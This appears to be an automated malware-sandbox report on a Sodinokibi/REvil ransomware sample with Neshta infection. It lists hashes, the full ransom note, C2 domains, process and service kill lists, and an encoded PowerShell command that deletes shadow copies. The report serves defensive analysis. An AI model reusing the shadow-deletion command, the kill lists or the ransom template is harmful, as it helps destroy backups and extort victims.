Overview

overview

10

Static

static

10

7227cb2316...68.exe

windows7_x64

10

7227cb2316...68.exe

windows10_x64

10

Analysis

  • max time kernel
    142s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe

  • Size

    205KB

  • MD5

    ea0acb3bfaee6386a9270cc314ebfed9

  • SHA1

    bdc92076c2851d408af99a4c6a6a42a4a12c5d9d

  • SHA256

    7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68

  • SHA512

    f29d48b87085e8fb3502b48d97f8499baa375bfc91a0b96bfdc1e733b24eb0f5ad8baca41f145614943746fc42a30c3408b6a3e4332c8ddb2c14cf45a406f532

Score
10/10
neshtasodinokibi191428persistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\w2446t-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion w2446t. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B4367D7560EB54A2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/B4367D7560EB54A2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: rHeaJMnZDrW15gvs1muMbUmoJu6qP/mPHJpryN3bbCU67X3b/6WvlOThHqCAoP2p dVVnMfhqefek47fVpOzampS0Mkl/JfLxQsrxsephlzICGvwZcLSCc/KUaQ5dCUKU B3/R/JkfMnEmeDcOLiJca1wP4woS5d9puf0lpSm9JoPW9kA1/OIiazj7AhWY9juU +g2Gzacu7HrS85mJWs9/cUVpO84WpJs8cnUh5QaGxCz53BLpZoZZwW6jDT3MBTCW 5ybK9GAVK9PkGVJBS5/gBgyeeI5SlSW/lhaaTM8qmfhFBEh0t4Hghor9c3pmC5Np fS2d6qT+0jFGoQ6veP4eTl/OdiDwEagaJZveXuLyipvxJPwuISmxQZvpDCbdoJgl JQorjxIIAXUGPKMdHuK/Z0pscUTRJWTeEUd5U2+gz0Rli++N7a5c+49NcpxnXy0E 9Jt/tttgR9jyvzPmHlH++1+OqKvYeAWile+tEfTHl4Ob5IEm1BVM+8Spq4nkauN5 dD7rU+Yya+TsnQOI+A2J3+K9eCDB4yHFwHdu/1KvB75mpNOH6G9VvgX67IPJ+kEa owZ4gvmXaMEtXopYnLgynbe5wLZf3Ss5M+q8h1pjPjDxMKqdVFq8e4Fav8hvIxyI yRmXA016SVIyO+oHOke1ql5bL9lNgWS4tFNcwnlHSNeORgSpsmHCwi3N3OzzUMjR mffeXD9baYGmwhgVWh1tQMJJQwiExE2KEhH7fPudEdLe0HM5W3/0EQGYmUhjEmXX 51z7+RgIFvhLolRaoLL98nFmECq75d8fNgHLu/x3hkcihU+VXMQxAMAKLQ6uxSf5 QWm3d4S5DQ+CwhQnhuOVbfK9VK7FNqCwThlLrZYKAo6RuuS3co/FBByX8lNE6rXz Ao6Lm+e99+Q3adBhY4O2gEGmrI46j/iYou3mmXIz7IFcIE74Q78ULtijl1Ju5sG6 I5y5NDo5H30G3kGn4tqa1nPaVeyeY97lG4OprELID+yNrxdOufeHMQlzqP8pjZFM QGJGzY4/mlb1mWkL+c6iuvIpJI7CBzAylYkK6WYLOOel+G6oKOauiZ77dy9mJfMX OXJUj4x4yv2Q+sel+QeK47XSd92ruixghGo++xVC3R7zxjgjiUEEO6YP5vqUtoSW ioSCyA== Extension name: w2446t ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B4367D7560EB54A2

http://decryptor.top/B4367D7560EB54A2

Extracted

Family

sodinokibi

Botnet

19

Campaign

1428

C2

ketomealprep.academy

lyricalduniya.com

ikadomus.com

volta.plus

ykobbqchicken.ca

axisoflove.org:443

supercarhire.co.uk

autoteamlast.de

makingmillionaires.net

eastgrinsteadwingchun.com

pilotgreen.com

kafkacare.com

biketruck.de

stanleyqualitysystems.com

rattanwarehouse.co.uk

humanviruses.org

keuken-prijs.nl

jobscore.com

atelierkomon.com

onlinetvgroup.com
Attributes
  • net

    true

  • pid

    19

  • prc

    thunderbird

    ocssd

    sqlagent

    firefoxconfig

    powerpnt

    steam

    sqlbrowser

    synctime

    oracle

    infopath

    sqlservr

    agntsvc

    winword

    dbsnmp

    sqbcoreservice

    dbeng50

    mysqld_nt

    tbirdconfig

    msaccess

    mysqld_opt

    wordpad

    xfssvccon

    isqlplussvc

    excel

    thebat

    mysqld

    onenote

    ocomm

    msftesql

    mspub

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    1428

  • svc

    sql

    veeam

    vss

    sophos

    memtas

    backup

    mepocs

    svc$

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe
    "C:\Users\Admin\AppData\Local\Temp\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Users\Admin\AppData\Local\Temp\3582-490\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:760
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1788
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:620

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe
      MD5

      83e92758d97a8daac290affd8172123c

      SHA1

      10784ae6ff2685f10aa1f5d16c2981de7be8702a

      SHA256

      ba76db6dc7d7045db201d4a8dba17f17dc91d735490976fbd1ef9a0b1dcc38a7

      SHA512

      4de3a34df593c4cafeb2046e1b3dba6653f089739871ad0f36ae09387555fd8c6c5c09f4e42cc2db2bffd388fa8e5b0a2eac752af609467c725fb5ad675ce42d

      Download Submit

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe
      MD5

      83e92758d97a8daac290affd8172123c

      SHA1

      10784ae6ff2685f10aa1f5d16c2981de7be8702a

      SHA256

      ba76db6dc7d7045db201d4a8dba17f17dc91d735490976fbd1ef9a0b1dcc38a7

      SHA512

      4de3a34df593c4cafeb2046e1b3dba6653f089739871ad0f36ae09387555fd8c6c5c09f4e42cc2db2bffd388fa8e5b0a2eac752af609467c725fb5ad675ce42d

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\7227cb2316b9e3b678698609b41ba67958d509fbf37c46cbde714b105b71bd68.exe
      MD5

      83e92758d97a8daac290affd8172123c

      SHA1

      10784ae6ff2685f10aa1f5d16c2981de7be8702a

      SHA256

      ba76db6dc7d7045db201d4a8dba17f17dc91d735490976fbd1ef9a0b1dcc38a7

      SHA512

      4de3a34df593c4cafeb2046e1b3dba6653f089739871ad0f36ae09387555fd8c6c5c09f4e42cc2db2bffd388fa8e5b0a2eac752af609467c725fb5ad675ce42d

      Download Submit

    • memory/760-59-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

      Filesize

      8KB

      Download

    • memory/760-61-0x00000000028A0000-0x00000000028A2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/760-62-0x00000000028A2000-0x00000000028A4000-memory.dmp

      Filesize

      8KB

      Download

    • memory/760-63-0x00000000028A4000-0x00000000028A7000-memory.dmp

      Filesize

      12KB

      Download

    • memory/760-60-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

      Filesize

      11.4MB

      Download

    • memory/760-64-0x00000000028AB000-0x00000000028CA000-memory.dmp

      Filesize

      124KB

      Download

    • memory/968-54-0x00000000754B1000-0x00000000754B3000-memory.dmp

      Filesize

      8KB

      Download